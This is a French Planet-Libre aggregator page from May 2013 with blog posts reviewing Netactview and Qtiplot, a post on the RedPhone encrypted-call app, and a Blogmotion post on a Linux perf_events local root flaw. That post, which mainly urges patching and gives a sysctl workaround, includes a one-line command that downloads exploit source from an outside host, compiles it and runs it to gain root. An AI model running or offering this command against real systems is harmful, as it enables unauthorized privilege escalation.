PROJET AUTOBLOG


Planet-Libre

source: Planet-Libre

⇐ retour index

Framablog : Geektionnerd : Rapport Lescure

vendredi 17 mai 2013 à 11:42

Geektionnerd - Simon Gee Giraudot - CC by-sa

Geektionnerd - Simon Gee Giraudot - CC by-sa

Geektionnerd - Simon Gee Giraudot - CC by-sa

Crédit : Simon Gee Giraudot (Creative Commons By-Sa)

Gravatar de Framablog
Original post of Framablog.Votez pour ce billet sur Planet Libre.

Noireaude : Surveillez facilement vos connexions réseau sur GNU/Linux grâce à Netactview

vendredi 17 mai 2013 à 11:34

Netactview Plop les bovins, il est clair qu’utiliser un PC sans connexion Internet devient très rare de nos jours. Dans ce contexte il peut être utile garder un œil sur les différents protocoles et processus s’exécutant sur votre réseau. Netactview est un GUI qui a pour but de faciliter l’utilisation de Netsat en proposant à peu près les mêmes fonctions et qui va vous permettre de surveiller tout ça en temps réel. Vous serez ainsi en mesure de surveiller facilement les processus actifs, les différents protocoles, les noms d’hôtes etc… Netactview permet également de personnaliser les colonnes, d’enregistrer les informations récoltées et d’intégrer des filtres personnalisés, afin de ne cibler et de n’afficher que les résultats qui vous intéressent. Netactview prend en charge les protocoles UDP, TCP, UDP6, tcp6, permet de travailler en temps réel et dispose également d’une fonctionnalité pratique, qui vous permet de voir les connexions prenant fin pendant encore 3 secondes après leur clôture. Vous pourrez également enregistrer votre liste de connexions dans un fichier texte afin de les comparer à des dates ultérieures.

Netactview

L’actu étant calme, j’ai testé un peu cet outil ce matin et je dois avouer que je l’ai trouvé vraiment très sympa. J’ai aimé sa simplicité d’utilisation, l’ergonomie de son interface et les options qui bien que basiques, sont largement suffisantes pour un usage commun. Cela dit je vais être objectif et reconnaître quand même qu’il ne contentera sans doute pas les habitués de la ligne de commande. Ceux-ci ne délaisseront sans doute pas la commande « netstat », offrant quand même plus de possibilités.

Conclusion :

Cet outil est  très intéressant pour les débutants ou pour ceux qui veulent consulter les infos de base en un clic.

Installation :

Si vous voulez tester Netactview, celui-ci est disponible sur la plus part des distributions GNU/Linux. Vous pouvez télécharger les sources et les binaires pour Debian, Ubuntu et dérivés, depuis cette page.

Netactview est également disponible sur Archlinux en passant par AUR.

PS : Question à deux balles, vous aimez bien ce style de mise en page « hybride » ?

Amusez-vous bien.

Moo!

source

flattr this!

Gravatar de Noireaude
Original post of Noireaude.Votez pour ce billet sur Planet Libre.

Noireaude : Qtiplot – Un outil de retranscription et d’analyse sympa pour les scientifiques

vendredi 17 mai 2013 à 09:10

Plop les bovins !!!

Qtiplot est un petit utilitaire sympa destiné à un public scientifique, qui grâce à une interface claire et simple saura néanmoins retranscrire toutes sortes d’équations et analyser de multiples données. Des fonctions linéaires aux systèmes paramétrés, en passant par la représentation matricielle et l’analyse de données sous forme de tableur, cet utilitaire sait décidément tout faire (ou presque).

Parmi ses fonctionnalités on pourra noter :

etc …

La liste complète de ses fonctionnalités ainsi que leurs explications sont disponibles sur le site officiel de Qtiplot.

Outre ses fonctions standards, Qtiplot est également extensible à l’aide du parser (analyseur) mathématique « muParser » et de divers scripts Python. Cela permet d’y inclure des fonctions personnalisées, ayant accès à toutes sortes de données comme les tables de matrices ou encore les tableaux de données.

C’est notamment pour ces raisons que Qtiplot est le logiciel de représentation graphique utilisé dans plusieurs universités, comme le Département de Physique de l’École Normale Supérieure (et une centaine d’autres à travers le monde), ainsi que dans de nombreuses entreprises (comme Siemen et NEC).

Si ça vous tente voici une petite vidéo de démonstration qui nous montre un peu ce que sait faire ce logiciel :

Notons qu’il est possible d’obtenir un support du service technique de Qtiplot en se rendant sur le Site Officiel. Le nombre d’heures de support est variable selon la situation (utilisateur particulier, entreprise, université, etc…). Les prix quant à eux sont disponibles à cette adresse.

Je dois avouer que le nombre d’heures proposées pour le particulier ne rend pas l’offre très intéressante. En revanche elle est très avantageuse pour les Campus, avec notamment un support technique illimité durant la durée du contrat de maintenance.

Installation :

L’installation de Qtiplot se fait très simplement sous Ubuntu via la Logithèquen ou en passant par la ligne de commande:

sudo apt-get install qtiplot

Sous Archlinux Qtiplot se trouve dans le dépôt extra et il est disponible en entrant la commande suivante :

pacman -S qtiplot

Une documentation est également disponible pour Ubuntu et Archlinux via l’installation du paquet « qtiplot-doc ».

Sous le capot :

Qtiplot met avant tout l’accent sur la portabilité du code. Ainsi nous pourrons trouver une version native pour Windows, Mac et Linux.

Du coté des dépendances on remarque que muparser et python2 sont présents (sous Archlinux, et Ubuntu), ce qui permet de configurer soi-même ses propres fonctions et ce, même avec l’installation basique.

Coté graphique mesa est présente pour le rendu des graphiques tridimensionnels, avec le module QT4 d’OpenGL. GSL, libalglib et Boost se chargent quant à elles de la partie calcul scientifique.

Enfin, notons la présence (comme le nom pouvait le laisser penser) de QT. Qtiplot convient donc mieux à un bureau KDE (car moins de dépendances avec ce dernier), mais peut tout à fait être utilisé dans un environnement GTK.

Conclusion :

Pour conclure je dirais que Qtiplot fournit un outil puissant, complet et extensible, au scientifique cherchant un utilitaire tout-en-un qui permet un bon nombre de représentations mathématiques.

A mettre entre toutes les mains donc :)

Moo !!!

flattr this!

Gravatar de Noireaude
Original post of Noireaude.Votez pour ce billet sur Planet Libre.

Blogmotion : Exploiter puis corriger l’exploit root local sur Linux

vendredi 17 mai 2013 à 09:05

Une faille très bête mais très efficace touche le kernel Linux. Elle concerne les kernels compris entre :

si une valeur précise est activée dans les options de compilations du noyau : CONFIG_PERF_EVENTS.

Elle permet à un simple utilisateur de devenir root, sans mot de passe bien sûr (peut aussi faire crasher le système).

exploit-root-linux

A la différence des failles généralement découvertes celle-ci est très simple à utiliser, voici comment s'en prémunir.

L'exploit

En cause : la mauvaise déclaration d'un pointeur rapidement corrigé sur le dépôt git de kernel.org.

Ayant fraîchement installé Debian 7, je n'ai pas tardé de me rendre compte que la faille fonctionne parfaitement comme le montre l'illustration du billet ci-dessus.

Pour utiliser l'exploit :

wget http://fucksheep.org/~sd/warez/semtex.c --quiet && gcc-4.6 -O2 semtex.c && ./a.out

Une fois la faille corrigée vous obtiendrez : a.out: semtex.c:51: sheep: Assertion `!close(fd)' failed.

Autant le dire : ne trainez pas à corriger cette faille !

Du côté des Debian cela a été corrigé dans Wheezy (stable) avec le déploiement du kernel 3.2.41-2+deb7u2, pour les autres distributions le lien est présent en haut de la page de correctif Debian. RHEL 4 et 5 ne seraient pas affecté d'après RedHat, contrairement à la version 6 et MRG 2 (source).

Si vous êtes chez OVH je vous invite à lire le topic associé puisque les kernels sont déjà dispo.

Si vous ne voulez pas patcher de suite, vous pouvez contourner le problème de la façon suivante :

  1. Ajouter "kernel.perf_event_paranoid = 2" dans le fichier /etc/sysctl.conf
  2. Exécuter la commande suivante en étant root (pour éviter le reboot) :  sysctl -p

A vos upgrade, et vite car déjà plus de 48h se sont écoulées avant l'arrivée du patch.

Attention : même si GCC n'est pas disponible dans un environnement (chrooté par exemple) rien n'empêche de compiler avec GCC sur un serveur ayant la même architecture puis de récupérer le binaire afin de l’exécuter. Là aussi c'est bête, mais ça fonctionne si votre serveur est faillible.

Vous devriez me suivre sur Twitter : @xhark

Article original écrit par Mr Xhark publié sur Blogmotion le 17/05/2013 | 3 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Vous risquez d'être aussi intéressé par :

Gravatar de Blogmotion
Original post of Blogmotion.Votez pour ce billet sur Planet Libre.

Articles similaires

crowd42 : RedPhone : une application Andoird pour chiffrer ses appels téléphoniques

vendredi 17 mai 2013 à 02:31

Android-lock

Depuis que j’ai appris que le makhzen cherche à mettre sous surveillance toute la population marocaine, et l’attaque informatique dont a été victime les membres du site d’information Mamfakinch, je suis devenu plus parano que je l’étais avant. Bien que je n’aie pas d’activités qui puissent vraiment déranger le régime de M6.

Et dans la panoplie des outils que je juge -personnellement- indispensables, il y a RedPhone. Une application android développé par la société de Moxie Marlinspike Whisper Systems. Les mêmes à qui on doit TextSecure, l’app pour chiffrer ses sms.

RedPhone propose un chiffrement de bout en bout -via ZRTP- de vos appels téléphoniques passés depuis un Android. Ce qui suppose que les deux parties l’aient installé sur leurs smartphone. Car sinon, la personne appelée (qui n’a donc pas installé RedPhone) verra un message étrange s’afficher sur son écran, ensuite l’application va vous demander si vous souhaitez envoyer -via un sms- une invitation à cette personne, pour qu’elle installe RedPhone à son tour.

Cette application est disponible sur le Google Play, une fois que vous l’avez installé; vous créez un compte avec votre numéro de téléphone et le tour est joué.

Cet article RedPhone : une application Andoird pour chiffrer ses appels téléphoniques est apparu en premier sur crowd42.

Gravatar de crowd42
Original post of crowd42.Votez pour ce billet sur Planet Libre.